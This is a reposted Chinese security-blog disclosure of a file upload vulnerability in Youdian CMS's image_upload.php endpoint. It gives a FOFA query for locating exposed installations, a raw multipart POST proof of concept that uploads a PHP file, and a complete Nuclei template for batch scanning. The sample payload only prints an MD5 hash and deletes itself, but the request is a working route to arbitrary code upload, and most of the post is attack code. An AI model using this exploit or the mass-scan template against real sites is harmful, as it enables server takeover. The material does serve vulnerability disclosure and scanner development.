友点CMS image_upload.php 文件上传漏洞

admin 2024年4月22日07:21:50评论34 views字数 1900阅读6分20秒阅读模式

友点CMS image_upload.php 文件上传漏洞

漏洞简介

        友点CMS是一款高效且灵活的网站管理系统,它为用户提供了简单易用的界面和丰富的功能。友点CMS建站系统image_upload.php 接口处存在文件上传漏洞,恶意攻击者可能会利用此漏洞上传恶意文件,从而获取服务器权限。

漏洞复现

步骤一:使用以下搜索语法获取测试资产并确定测试目标~~~

# 搜索语法app="友点建站-CMS"

步骤二:以下为POC数据包上传PHP代码文件后获取上传地址...

POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1Host: 127.0.0.1Content-Type: multipart/form-data;boundary=----WebKitFormBoundarydAPjrmyKewWuf59HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0------WebKitFormBoundarydAPjrmyKewWuf59HContent-Disposition: form-data; name="files"; filename="ceshi.php"Content-Type: image/jpg<?php echo md5('666');unlink(__FILE__);?>------WebKitFormBoundarydAPjrmyKewWuf59H--

友点CMS image_upload.php 文件上传漏洞

步骤三:拼接并在浏览器中访问上传地址后....获得666的MD5加密值内容...

友点CMS image_upload.php 文件上传漏洞

批量脚本

id: Youdian-CMS-uploadfileinfo:  name: 友点CMS建站系统image_upload.php 接口处存在文件上传漏洞,恶意攻击者可能会利用此漏洞上传恶意文件,从而获取服务器权限。  author: LY  severity: high  metadata:     fofa-query: app="友点建站-CMS"variables:  filename: "{{to_lower(rand_base(10))}}"  boundary: "{{to_lower(rand_base(20))}}"http:  - raw:      - |        POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1        Host: {{Hostname}}        Content-Type: multipart/form-data;boundary=----WebKitFormBoundarydAPjrmyKewWuf59H        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36        Content-Length: 0        ------WebKitFormBoundarydAPjrmyKewWuf59H        Content-Disposition: form-data; name="files"; filename="{{filename}}.php"        Content-Type: image/jpg        <?php echo md5('666');unlink(__FILE__);?>        ------WebKitFormBoundarydAPjrmyKewWuf59H--      - |        GET /Public/image/uploads/{{path}}.php HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0    extractors:      - type: regex        name: path        group: 1        regex:           - 'image/uploads/(w*).php'        internal: true    matchers:      - type: dsl        dsl:          - status_code==200 && contains_all(body,"fae0b27c451c728867a567e8c1bb4e53")

        

原文始发于微信公众号(揽月安全团队):友点CMS image_upload.php 文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月22日07:21:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   友点CMS image_upload.php 文件上传漏洞http://cn-sec.com/archives/2576584.html

发表评论

匿名网友 填写信息